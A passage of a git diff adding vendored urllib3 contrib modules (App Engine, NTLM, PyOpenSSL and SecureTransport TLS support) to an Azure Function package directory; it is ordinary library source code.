http.request('GET', 'https://google.com/') + +There are `limitations `_ to the URLFetch service and it may not be +the best choice for your application. There are three options for using +urllib3 on Google App Engine: + +1. You can use :class:`AppEngineManager` with URLFetch. URLFetch is + cost-effective in many circumstances as long as your usage is within the + limitations. +2. You can use a normal :class:`~urllib3.PoolManager` by enabling sockets. + Sockets also have `limitations and restrictions + `_ and have a lower free quota than URLFetch. + To use sockets, be sure to specify the following in your ``app.yaml``:: + + env_variables: + GAE_USE_SOCKETS_HTTPLIB : 'true' + +3. If you are using `App Engine Flexible +`_, you can use the standard +:class:`PoolManager` without any configuration or special environment variables. +""" + +from __future__ import absolute_import + +import io +import logging +import warnings + +from ..exceptions import ( + HTTPError, + HTTPWarning, + MaxRetryError, + ProtocolError, + SSLError, + TimeoutError, +) +from ..packages.six.moves.urllib.parse import urljoin +from ..request import RequestMethods +from ..response import HTTPResponse +from ..util.retry import Retry +from ..util.timeout import Timeout +from . import _appengine_environ + +try: + from google.appengine.api import urlfetch +except ImportError: + urlfetch = None + + +log = logging.getLogger(__name__) + + +class AppEnginePlatformWarning(HTTPWarning): + pass + + +class AppEnginePlatformError(HTTPError): + pass + + +class AppEngineManager(RequestMethods): + """ + Connection manager for Google App Engine sandbox applications. + + This manager uses the URLFetch service directly instead of using the + emulated httplib, and is subject to URLFetch limitations as described in + the App Engine documentation `here + `_. + + Notably it will raise an :class:`AppEnginePlatformError` if: + * URLFetch is not available. + * If you attempt to use this on App Engine Flexible, as full socket + support is available. + * If a request size is more than 10 megabytes. + * If a response size is more than 32 megabytes. + * If you use an unsupported request method such as OPTIONS. + + Beyond those cases, it will raise normal urllib3 errors. + """ + + def __init__( + self, + headers=None, + retries=None, + validate_certificate=True, + urlfetch_retries=True, + ): + if not urlfetch: + raise AppEnginePlatformError( + "URLFetch is not available in this environment." + ) + + warnings.warn( + "urllib3 is using URLFetch on Google App Engine sandbox instead " + "of sockets. To use sockets directly instead of URLFetch see " + "https://urllib3.readthedocs.io/en/1.26.x/reference/urllib3.contrib.html.", + AppEnginePlatformWarning, + ) + + RequestMethods.__init__(self, headers) + self.validate_certificate = validate_certificate + self.urlfetch_retries = urlfetch_retries + + self.retries = retries or Retry.DEFAULT + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + # Return False to re-raise any potential exceptions + return False + + def urlopen( + self, + method, + url, + body=None, + headers=None, + retries=None, + redirect=True, + timeout=Timeout.DEFAULT_TIMEOUT, + **response_kw + ): + + retries = self._get_retries(retries, redirect) + + try: + follow_redirects = redirect and retries.redirect != 0 and retries.total + response = urlfetch.fetch( + url, + payload=body, + method=method, + headers=headers or {}, + allow_truncated=False, + follow_redirects=self.urlfetch_retries and follow_redirects, + deadline=self._get_absolute_timeout(timeout), + validate_certificate=self.validate_certificate, + ) + except urlfetch.DeadlineExceededError as e: + raise TimeoutError(self, e) + + except urlfetch.InvalidURLError as e: + if "too large" in str(e): + raise AppEnginePlatformError( + "URLFetch request too large, URLFetch only " + "supports requests up to 10mb in size.", + e, + ) + raise ProtocolError(e) + + except urlfetch.DownloadError as e: + if "Too many redirects" in str(e): + raise MaxRetryError(self, url, reason=e) + raise ProtocolError(e) + + except urlfetch.ResponseTooLargeError as e: + raise AppEnginePlatformError( + "URLFetch response too large, URLFetch only supports" + "responses up to 32mb in size.", + e, + ) + + except urlfetch.SSLCertificateError as e: + raise SSLError(e) + + except urlfetch.InvalidMethodError as e: + raise AppEnginePlatformError( + "URLFetch does not support method: %s" % method, e + ) + + http_response = self._urlfetch_response_to_http_response( + response, retries=retries, **response_kw + ) + + # Handle redirect? + redirect_location = redirect and http_response.get_redirect_location() + if redirect_location: + # Check for redirect response + if self.urlfetch_retries and retries.raise_on_redirect: + raise MaxRetryError(self, url, "too many redirects") + else: + if http_response.status == 303: + method = "GET" + + try: + retries = retries.increment( + method, url, response=http_response, _pool=self + ) + except MaxRetryError: + if retries.raise_on_redirect: + raise MaxRetryError(self, url, "too many redirects") + return http_response + + retries.sleep_for_retry(http_response) + log.debug("Redirecting %s -> %s", url, redirect_location) + redirect_url = urljoin(url, redirect_location) + return self.urlopen( + method, + redirect_url, + body, + headers, + retries=retries, + redirect=redirect, + timeout=timeout, + **response_kw + ) + + # Check if we should retry the HTTP response. + has_retry_after = bool(http_response.getheader("Retry-After")) + if retries.is_retry(method, http_response.status, has_retry_after): + retries = retries.increment(method, url, response=http_response, _pool=self) + log.debug("Retry: %s", url) + retries.sleep(http_response) + return self.urlopen( + method, + url, + body=body, + headers=headers, + retries=retries, + redirect=redirect, + timeout=timeout, + **response_kw + ) + + return http_response + + def _urlfetch_response_to_http_response(self, urlfetch_resp, **response_kw): + + if is_prod_appengine(): + # Production GAE handles deflate encoding automatically, but does + # not remove the encoding header. + content_encoding = urlfetch_resp.headers.get("content-encoding") + + if content_encoding == "deflate": + del urlfetch_resp.headers["content-encoding"] + + transfer_encoding = urlfetch_resp.headers.get("transfer-encoding") + # We have a full response's content, + # so let's make sure we don't report ourselves as chunked data. + if transfer_encoding == "chunked": + encodings = transfer_encoding.split(",") + encodings.remove("chunked") + urlfetch_resp.headers["transfer-encoding"] = ",".join(encodings) + + original_response = HTTPResponse( + # In order for decoding to work, we must present the content as + # a file-like object. + body=io.BytesIO(urlfetch_resp.content), + msg=urlfetch_resp.header_msg, + headers=urlfetch_resp.headers, + status=urlfetch_resp.status_code, + **response_kw + ) + + return HTTPResponse( + body=io.BytesIO(urlfetch_resp.content), + headers=urlfetch_resp.headers, + status=urlfetch_resp.status_code, + original_response=original_response, + **response_kw + ) + + def _get_absolute_timeout(self, timeout): + if timeout is Timeout.DEFAULT_TIMEOUT: + return None # Defer to URLFetch's default. + if isinstance(timeout, Timeout): + if timeout._read is not None or timeout._connect is not None: + warnings.warn( + "URLFetch does not support granular timeout settings, " + "reverting to total or default URLFetch timeout.", + AppEnginePlatformWarning, + ) + return timeout.total + return timeout + + def _get_retries(self, retries, redirect): + if not isinstance(retries, Retry): + retries = Retry.from_int(retries, redirect=redirect, default=self.retries) + + if retries.connect or retries.read or retries.redirect: + warnings.warn( + "URLFetch only supports total retries and does not " + "recognize connect, read, or redirect retry parameters.", + AppEnginePlatformWarning, + ) + + return retries + + +# Alias methods from _appengine_environ to maintain public API interface. + +is_appengine = _appengine_environ.is_appengine +is_appengine_sandbox = _appengine_environ.is_appengine_sandbox +is_local_appengine = _appengine_environ.is_local_appengine +is_prod_appengine = _appengine_environ.is_prod_appengine +is_prod_appengine_mvms = _appengine_environ.is_prod_appengine_mvms diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/ntlmpool.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/ntlmpool.py new file mode 100644 index 0000000..97435c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/ntlmpool.py @@ -0,0 +1,130 @@ +""" +NTLM authenticating pool, contributed by erikcederstran + +Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10 +""" +from __future__ import absolute_import + +import warnings +from logging import getLogger + +from ntlm import ntlm + +from .. import HTTPSConnectionPool +from ..packages.six.moves.http_client import HTTPSConnection + +warnings.warn( + "The 'urllib3.contrib.ntlmpool' module is deprecated and will be removed " + "in urllib3 v2.0 release, urllib3 is not able to support it properly due " + "to reasons listed in issue: https://github.com/urllib3/urllib3/issues/2282. " + "If you are a user of this module please comment in the mentioned issue.", + DeprecationWarning, +) + +log = getLogger(__name__) + + +class NTLMConnectionPool(HTTPSConnectionPool): + """ + Implements an NTLM authentication version of an urllib3 connection pool + """ + + scheme = "https" + + def __init__(self, user, pw, authurl, *args, **kwargs): + """ + authurl is a random URL on the server that is protected by NTLM. + user is the Windows user, probably in the DOMAIN\\username format. + pw is the password for the user. + """ + super(NTLMConnectionPool, self).__init__(*args, **kwargs) + self.authurl = authurl + self.rawuser = user + user_parts = user.split("\\", 1) + self.domain = user_parts[0].upper() + self.user = user_parts[1] + self.pw = pw + + def _new_conn(self): + # Performs the NTLM handshake that secures the connection. The socket + # must be kept open while requests are performed. + self.num_connections += 1 + log.debug( + "Starting NTLM HTTPS connection no. %d: https://%s%s", + self.num_connections, + self.host, + self.authurl, + ) + + headers = {"Connection": "Keep-Alive"} + req_header = "Authorization" + resp_header = "www-authenticate" + + conn = HTTPSConnection(host=self.host, port=self.port) + + # Send negotiation message + headers[req_header] = "NTLM %s" % ntlm.create_NTLM_NEGOTIATE_MESSAGE( + self.rawuser + ) + log.debug("Request headers: %s", headers) + conn.request("GET", self.authurl, None, headers) + res = conn.getresponse() + reshdr = dict(res.getheaders()) + log.debug("Response status: %s %s", res.status, res.reason) + log.debug("Response headers: %s", reshdr) + log.debug("Response data: %s [...]", res.read(100)) + + # Remove the reference to the socket, so that it can not be closed by + # the response object (we want to keep the socket open) + res.fp = None + + # Server should respond with a challenge message + auth_header_values = reshdr[resp_header].split(", ") + auth_header_value = None + for s in auth_header_values: + if s[:5] == "NTLM ": + auth_header_value = s[5:] + if auth_header_value is None: + raise Exception( + "Unexpected %s response header: %s" % (resp_header, reshdr[resp_header]) + ) + + # Send authentication message + ServerChallenge, NegotiateFlags = ntlm.parse_NTLM_CHALLENGE_MESSAGE( + auth_header_value + ) + auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE( + ServerChallenge, self.user, self.domain, self.pw, NegotiateFlags + ) + headers[req_header] = "NTLM %s" % auth_msg + log.debug("Request headers: %s", headers) + conn.request("GET", self.authurl, None, headers) + res = conn.getresponse() + log.debug("Response status: %s %s", res.status, res.reason) + log.debug("Response headers: %s", dict(res.getheaders())) + log.debug("Response data: %s [...]", res.read()[:100]) + if res.status != 200: + if res.status == 401: + raise Exception("Server rejected request: wrong username or password") + raise Exception("Wrong server response: %s %s" % (res.status, res.reason)) + + res.fp = None + log.debug("Connection established") + return conn + + def urlopen( + self, + method, + url, + body=None, + headers=None, + retries=3, + redirect=True, + assert_same_host=True, + ): + if headers is None: + headers = {} + headers["Connection"] = "Keep-Alive" + return super(NTLMConnectionPool, self).urlopen( + method, url, body, headers, retries, redirect, assert_same_host + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/pyopenssl.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/pyopenssl.py new file mode 100644 index 0000000..3e69df4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/pyopenssl.py @@ -0,0 +1,511 @@ +""" +TLS with SNI_-support for Python 2. Follow these instructions if you would +like to verify TLS certificates in Python 2. Note, the default libraries do +*not* do certificate checking; you need to do additional work to validate +certificates yourself. + +This needs the following packages installed: + +* `pyOpenSSL`_ (tested with 16.0.0) +* `cryptography`_ (minimum 1.3.4, from pyopenssl) +* `idna`_ (minimum 2.0, from cryptography) + +However, pyopenssl depends on cryptography, which depends on idna, so while we +use all three directly here we end up having relatively few packages required. + +You can install them with the following command: + +.. code-block:: bash + + $ python -m pip install pyopenssl cryptography idna + +To activate certificate checking, call +:func:`~urllib3.contrib.pyopenssl.inject_into_urllib3` from your Python code +before you begin making HTTP requests. This can be done in a ``sitecustomize`` +module, or at any other time before your application begins using ``urllib3``, +like this: + +.. code-block:: python + + try: + import urllib3.contrib.pyopenssl + urllib3.contrib.pyopenssl.inject_into_urllib3() + except ImportError: + pass + +Now you can use :mod:`urllib3` as you normally would, and it will support SNI +when the required modules are installed. + +Activating this module also has the positive side effect of disabling SSL/TLS +compression in Python 2 (see `CRIME attack`_). + +.. _sni: https://en.wikipedia.org/wiki/Server_Name_Indication +.. _crime attack: https://en.wikipedia.org/wiki/CRIME_(security_exploit) +.. _pyopenssl: https://www.pyopenssl.org +.. _cryptography: https://cryptography.io +.. _idna: https://github.com/kjd/idna +""" +from __future__ import absolute_import + +import OpenSSL.SSL +from cryptography import x509 +from cryptography.hazmat.backends.openssl import backend as openssl_backend +from cryptography.hazmat.backends.openssl.x509 import _Certificate + +try: + from cryptography.x509 import UnsupportedExtension +except ImportError: + # UnsupportedExtension is gone in cryptography >= 2.1.0 + class UnsupportedExtension(Exception): + pass + + +from io import BytesIO +from socket import error as SocketError +from socket import timeout + +try: # Platform-specific: Python 2 + from socket import _fileobject +except ImportError: # Platform-specific: Python 3 + _fileobject = None + from ..packages.backports.makefile import backport_makefile + +import logging +import ssl +import sys + +from .. import util +from ..packages import six +from ..util.ssl_ import PROTOCOL_TLS_CLIENT + +__all__ = ["inject_into_urllib3", "extract_from_urllib3"] + +# SNI always works. +HAS_SNI = True + +# Map from urllib3 to PyOpenSSL compatible parameter-values. +_openssl_versions = { + util.PROTOCOL_TLS: OpenSSL.SSL.SSLv23_METHOD, + PROTOCOL_TLS_CLIENT: OpenSSL.SSL.SSLv23_METHOD, + ssl.PROTOCOL_TLSv1: OpenSSL.SSL.TLSv1_METHOD, +} + +if hasattr(ssl, "PROTOCOL_SSLv3") and hasattr(OpenSSL.SSL, "SSLv3_METHOD"): + _openssl_versions[ssl.PROTOCOL_SSLv3] = OpenSSL.SSL.SSLv3_METHOD + +if hasattr(ssl, "PROTOCOL_TLSv1_1") and hasattr(OpenSSL.SSL, "TLSv1_1_METHOD"): + _openssl_versions[ssl.PROTOCOL_TLSv1_1] = OpenSSL.SSL.TLSv1_1_METHOD + +if hasattr(ssl, "PROTOCOL_TLSv1_2") and hasattr(OpenSSL.SSL, "TLSv1_2_METHOD"): + _openssl_versions[ssl.PROTOCOL_TLSv1_2] = OpenSSL.SSL.TLSv1_2_METHOD + + +_stdlib_to_openssl_verify = { + ssl.CERT_NONE: OpenSSL.SSL.VERIFY_NONE, + ssl.CERT_OPTIONAL: OpenSSL.SSL.VERIFY_PEER, + ssl.CERT_REQUIRED: OpenSSL.SSL.VERIFY_PEER + + OpenSSL.SSL.VERIFY_FAIL_IF_NO_PEER_CERT, +} +_openssl_to_stdlib_verify = dict((v, k) for k, v in _stdlib_to_openssl_verify.items()) + +# OpenSSL will only write 16K at a time +SSL_WRITE_BLOCKSIZE = 16384 + +orig_util_HAS_SNI = util.HAS_SNI +orig_util_SSLContext = util.ssl_.SSLContext + + +log = logging.getLogger(__name__) + + +def inject_into_urllib3(): + "Monkey-patch urllib3 with PyOpenSSL-backed SSL-support." + + _validate_dependencies_met() + + util.SSLContext = PyOpenSSLContext + util.ssl_.SSLContext = PyOpenSSLContext + util.HAS_SNI = HAS_SNI + util.ssl_.HAS_SNI = HAS_SNI + util.IS_PYOPENSSL = True + util.ssl_.IS_PYOPENSSL = True + + +def extract_from_urllib3(): + "Undo monkey-patching by :func:`inject_into_urllib3`." + + util.SSLContext = orig_util_SSLContext + util.ssl_.SSLContext = orig_util_SSLContext + util.HAS_SNI = orig_util_HAS_SNI + util.ssl_.HAS_SNI = orig_util_HAS_SNI + util.IS_PYOPENSSL = False + util.ssl_.IS_PYOPENSSL = False + + +def _validate_dependencies_met(): + """ + Verifies that PyOpenSSL's package-level dependencies have been met. + Throws `ImportError` if they are not met. + """ + # Method added in `cryptography==1.1`; not available in older versions + from cryptography.x509.extensions import Extensions + + if getattr(Extensions, "get_extension_for_class", None) is None: + raise ImportError( + "'cryptography' module missing required functionality. " + "Try upgrading to v1.3.4 or newer." + ) + + # pyOpenSSL 0.14 and above use cryptography for OpenSSL bindings. The _x509 + # attribute is only present on those versions. + from OpenSSL.crypto import X509 + + x509 = X509() + if getattr(x509, "_x509", None) is None: + raise ImportError( + "'pyOpenSSL' module missing required functionality. " + "Try upgrading to v0.14 or newer." + ) + + +def _dnsname_to_stdlib(name): + """ + Converts a dNSName SubjectAlternativeName field to the form used by the + standard library on the given Python version. + + Cryptography produces a dNSName as a unicode string that was idna-decoded + from ASCII bytes. We need to idna-encode that string to get it back, and + then on Python 3 we also need to convert to unicode via UTF-8 (the stdlib + uses PyUnicode_FromStringAndSize on it, which decodes via UTF-8). + + If the name cannot be idna-encoded then we return None signalling that + the name given should be skipped. + """ + + def idna_encode(name): + """ + Borrowed wholesale from the Python Cryptography Project. It turns out + that we can't just safely call `idna.encode`: it can explode for + wildcard names. This avoids that problem. + """ + import idna + + try: + for prefix in [u"*.", u"."]: + if name.startswith(prefix): + name = name[len(prefix) :] + return prefix.encode("ascii") + idna.encode(name) + return idna.encode(name) + except idna.core.IDNAError: + return None + + # Don't send IPv6 addresses through the IDNA encoder. + if ":" in name: + return name + + name = idna_encode(name) + if name is None: + return None + elif sys.version_info >= (3, 0): + name = name.decode("utf-8") + return name + + +def get_subj_alt_name(peer_cert): + """ + Given an PyOpenSSL certificate, provides all the subject alternative names. + """ + # Pass the cert to cryptography, which has much better APIs for this. + if hasattr(peer_cert, "to_cryptography"): + cert = peer_cert.to_cryptography() + else: + # This is technically using private APIs, but should work across all + # relevant versions before PyOpenSSL got a proper API for this. + cert = _Certificate(openssl_backend, peer_cert._x509) + + # We want to find the SAN extension. Ask Cryptography to locate it (it's + # faster than looping in Python) + try: + ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value + except x509.ExtensionNotFound: + # No such extension, return the empty list. + return [] + except ( + x509.DuplicateExtension, + UnsupportedExtension, + x509.UnsupportedGeneralNameType, + UnicodeError, + ) as e: + # A problem has been found with the quality of the certificate. Assume + # no SAN field is present. + log.warning( + "A problem was encountered with the certificate that prevented " + "urllib3 from finding the SubjectAlternativeName field. This can " + "affect certificate validation. The error was %s", + e, + ) + return [] + + # We want to return dNSName and iPAddress fields. We need to cast the IPs + # back to strings because the match_hostname function wants them as + # strings. + # Sadly the DNS names need to be idna encoded and then, on Python 3, UTF-8 + # decoded. This is pretty frustrating, but that's what the standard library + # does with certificates, and so we need to attempt to do the same. + # We also want to skip over names which cannot be idna encoded. + names = [ + ("DNS", name) + for name in map(_dnsname_to_stdlib, ext.get_values_for_type(x509.DNSName)) + if name is not None + ] + names.extend( + ("IP Address", str(name)) for name in ext.get_values_for_type(x509.IPAddress) + ) + + return names + + +class WrappedSocket(object): + """API-compatibility wrapper for Python OpenSSL's Connection-class. + + Note: _makefile_refs, _drop() and _reuse() are needed for the garbage + collector of pypy. + """ + + def __init__(self, connection, socket, suppress_ragged_eofs=True): + self.connection = connection + self.socket = socket + self.suppress_ragged_eofs = suppress_ragged_eofs + self._makefile_refs = 0 + self._closed = False + + def fileno(self): + return self.socket.fileno() + + # Copy-pasted from Python 3.5 source code + def _decref_socketios(self): + if self._makefile_refs > 0: + self._makefile_refs -= 1 + if self._closed: + self.close() + + def recv(self, *args, **kwargs): + try: + data = self.connection.recv(*args, **kwargs) + except OpenSSL.SSL.SysCallError as e: + if self.suppress_ragged_eofs and e.args == (-1, "Unexpected EOF"): + return b"" + else: + raise SocketError(str(e)) + except OpenSSL.SSL.ZeroReturnError: + if self.connection.get_shutdown() == OpenSSL.SSL.RECEIVED_SHUTDOWN: + return b"" + else: + raise + except OpenSSL.SSL.WantReadError: + if not util.wait_for_read(self.socket, self.socket.gettimeout()): + raise timeout("The read operation timed out") + else: + return self.recv(*args, **kwargs) + + # TLS 1.3 post-handshake authentication + except OpenSSL.SSL.Error as e: + raise ssl.SSLError("read error: %r" % e) + else: + return data + + def recv_into(self, *args, **kwargs): + try: + return self.connection.recv_into(*args, **kwargs) + except OpenSSL.SSL.SysCallError as e: + if self.suppress_ragged_eofs and e.args == (-1, "Unexpected EOF"): + return 0 + else: + raise SocketError(str(e)) + except OpenSSL.SSL.ZeroReturnError: + if self.connection.get_shutdown() == OpenSSL.SSL.RECEIVED_SHUTDOWN: + return 0 + else: + raise + except OpenSSL.SSL.WantReadError: + if not util.wait_for_read(self.socket, self.socket.gettimeout()): + raise timeout("The read operation timed out") + else: + return self.recv_into(*args, **kwargs) + + # TLS 1.3 post-handshake authentication + except OpenSSL.SSL.Error as e: + raise ssl.SSLError("read error: %r" % e) + + def settimeout(self, timeout): + return self.socket.settimeout(timeout) + + def _send_until_done(self, data): + while True: + try: + return self.connection.send(data) + except OpenSSL.SSL.WantWriteError: + if not util.wait_for_write(self.socket, self.socket.gettimeout()): + raise timeout() + continue + except OpenSSL.SSL.SysCallError as e: + raise SocketError(str(e)) + + def sendall(self, data): + total_sent = 0 + while total_sent < len(data): + sent = self._send_until_done( + data[total_sent : total_sent + SSL_WRITE_BLOCKSIZE] + ) + total_sent += sent + + def shutdown(self): + # FIXME rethrow compatible exceptions should we ever use this + self.connection.shutdown() + + def close(self): + if self._makefile_refs < 1: + try: + self._closed = True + return self.connection.close() + except OpenSSL.SSL.Error: + return + else: + self._makefile_refs -= 1 + + def getpeercert(self, binary_form=False): + x509 = self.connection.get_peer_certificate() + + if not x509: + return x509 + + if binary_form: + return OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_ASN1, x509) + + return { + "subject": ((("commonName", x509.get_subject().CN),),), + "subjectAltName": get_subj_alt_name(x509), + } + + def version(self): + return self.connection.get_protocol_version_name() + + def _reuse(self): + self._makefile_refs += 1 + + def _drop(self): + if self._makefile_refs < 1: + self.close() + else: + self._makefile_refs -= 1 + + +if _fileobject: # Platform-specific: Python 2 + + def makefile(self, mode, bufsize=-1): + self._makefile_refs += 1 + return _fileobject(self, mode, bufsize, close=True) + + +else: # Platform-specific: Python 3 + makefile = backport_makefile + +WrappedSocket.makefile = makefile + + +class PyOpenSSLContext(object): + """ + I am a wrapper class for the PyOpenSSL ``Context`` object. I am responsible + for translating the interface of the standard library ``SSLContext`` object + to calls into PyOpenSSL. + """ + + def __init__(self, protocol): + self.protocol = _openssl_versions[protocol] + self._ctx = OpenSSL.SSL.Context(self.protocol) + self._options = 0 + self.check_hostname = False + + @property + def options(self): + return self._options + + @options.setter + def options(self, value): + self._options = value + self._ctx.set_options(value) + + @property + def verify_mode(self): + return _openssl_to_stdlib_verify[self._ctx.get_verify_mode()] + + @verify_mode.setter + def verify_mode(self, value): + self._ctx.set_verify(_stdlib_to_openssl_verify[value], _verify_callback) + + def set_default_verify_paths(self): + self._ctx.set_default_verify_paths() + + def set_ciphers(self, ciphers): + if isinstance(ciphers, six.text_type): + ciphers = ciphers.encode("utf-8") + self._ctx.set_cipher_list(ciphers) + + def load_verify_locations(self, cafile=None, capath=None, cadata=None): + if cafile is not None: + cafile = cafile.encode("utf-8") + if capath is not None: + capath = capath.encode("utf-8") + try: + self._ctx.load_verify_locations(cafile, capath) + if cadata is not None: + self._ctx.load_verify_locations(BytesIO(cadata)) + except OpenSSL.SSL.Error as e: + raise ssl.SSLError("unable to load trusted certificates: %r" % e) + + def load_cert_chain(self, certfile, keyfile=None, password=None): + self._ctx.use_certificate_chain_file(certfile) + if password is not None: + if not isinstance(password, six.binary_type): + password = password.encode("utf-8") + self._ctx.set_passwd_cb(lambda *_: password) + self._ctx.use_privatekey_file(keyfile or certfile) + + def set_alpn_protocols(self, protocols): + protocols = [six.ensure_binary(p) for p in protocols] + return self._ctx.set_alpn_protos(protocols) + + def wrap_socket( + self, + sock, + server_side=False, + do_handshake_on_connect=True, + suppress_ragged_eofs=True, + server_hostname=None, + ): + cnx = OpenSSL.SSL.Connection(self._ctx, sock) + + if isinstance(server_hostname, six.text_type): # Platform-specific: Python 3 + server_hostname = server_hostname.encode("utf-8") + + if server_hostname is not None: + cnx.set_tlsext_host_name(server_hostname) + + cnx.set_connect_state() + + while True: + try: + cnx.do_handshake() + except OpenSSL.SSL.WantReadError: + if not util.wait_for_read(sock, sock.gettimeout()): + raise timeout("select timed out") + continue + except OpenSSL.SSL.Error as e: + raise ssl.SSLError("bad handshake: %r" % e) + break + + return WrappedSocket(cnx, sock) + + +def _verify_callback(cnx, x509, err_no, err_depth, return_code): + return err_no == 0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/securetransport.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/securetransport.py new file mode 100644 index 0000000..7d5f1b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/securetransport.py @@ -0,0 +1,922 @@ +""" +SecureTranport support for urllib3 via ctypes. + +This makes platform-native TLS available to urllib3 users on macOS without the +use of a compiler. This is an important feature because the Python Package +Index is moving to become a TLSv1.2-or-higher server, and the default OpenSSL +that ships with macOS is not capable of doing TLSv1.2. The only way to resolve +this is to give macOS users an alternative solution to the problem, and that +solution is to use SecureTransport. + +We use ctypes here because this solution must not require a compiler. That's +because pip is not allowed to require a compiler either. + +This is not intended to be a seriously long-term solution to this problem. +The hope is that PEP 543 will eventually solve this issue for us, at which +point we can retire this contrib module. But in the short term, we need to +solve the impending tire fire that is Python on Mac without this kind of +contrib module. So...here we are. + +To use this module, simply import and inject it:: + + import urllib3.contrib.securetransport + urllib3.contrib.securetransport.inject_into_urllib3() + +Happy TLSing! + +This code is a bastardised version of the code found in Will Bond's oscrypto +library. An enormous debt is owed to him for blazing this trail for us. For +that reason, this code should be considered to be covered both by urllib3's +license and by oscrypto's: + +.. code-block:: + + Copyright (c) 2015-2016 Will Bond + + Permission is hereby granted, free of charge, to any person obtaining a + copy of this software and associated documentation files (the "Software"), + to deal in the Software without restriction, including without limitation + the rights to use, copy, modify, merge, publish, distribute, sublicense, + and/or sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER + DEALINGS IN THE SOFTWARE. +""" +from __future__ import absolute_import + +import contextlib +import ctypes +import errno +import os.path +import shutil +import socket +import ssl +import struct +import threading +import weakref + +import six + +from .. import util +from ..util.ssl_ import PROTOCOL_TLS_CLIENT +from ._securetransport.bindings import CoreFoundation, Security, SecurityConst +from ._securetransport.low_level import ( + _assert_no_error, + _build_tls_unknown_ca_alert, + _cert_array_from_pem, + _create_cfstring_array, + _load_client_cert_chain, + _temporary_keychain, +) + +try: # Platform-specific: Python 2 + from socket import _fileobject +except ImportError: # Platform-specific: Python 3 + _fileobject = None + from ..packages.backports.makefile import backport_makefile + +__all__ = ["inject_into_urllib3", "extract_from_urllib3"] + +# SNI always works +HAS_SNI = True + +orig_util_HAS_SNI = util.HAS_SNI +orig_util_SSLContext = util.ssl_.SSLContext + +# This dictionary is used by the read callback to obtain a handle to the +# calling wrapped socket. This is a pretty silly approach, but for now it'll +# do. I feel like I should be able to smuggle a handle to the wrapped socket +# directly in the SSLConnectionRef, but for now this approach will work I +# guess. +# +# We need to lock around this structure for inserts, but we don't do it for +# reads/writes in the callbacks. The reasoning here goes as follows: +# +# 1. It is not possible to call into the callbacks before the dictionary is +# populated, so once in the callback the id must be in the dictionary. +# 2. The callbacks don't mutate the dictionary, they only read from it, and +# so cannot conflict with any of the insertions. +# +# This is good: if we had to lock in the callbacks we'd drastically slow down +# the performance of this code. +_connection_refs = weakref.WeakValueDictionary() +_connection_ref_lock = threading.Lock() + +# Limit writes to 16kB. This is OpenSSL's limit, but we'll cargo-cult it over +# for no better reason than we need *a* limit, and this one is right there. +SSL_WRITE_BLOCKSIZE = 16384 + +# This is our equivalent of util.ssl_.DEFAULT_CIPHERS, but expanded out to +# individual cipher suites. We need to do this because this is how +# SecureTransport wants them. +CIPHER_SUITES = [ + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256, + SecurityConst.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256, + SecurityConst.TLS_DHE_RSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_DHE_RSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, + SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA256, + SecurityConst.TLS_DHE_RSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_DHE_RSA_WITH_AES_128_CBC_SHA, + SecurityConst.TLS_AES_256_GCM_SHA384, + SecurityConst.TLS_AES_128_GCM_SHA256, + SecurityConst.TLS_RSA_WITH_AES_256_GCM_SHA384, + SecurityConst.TLS_RSA_WITH_AES_128_GCM_SHA256, + SecurityConst.TLS_AES_128_CCM_8_SHA256, + SecurityConst.TLS_AES_128_CCM_SHA256, + 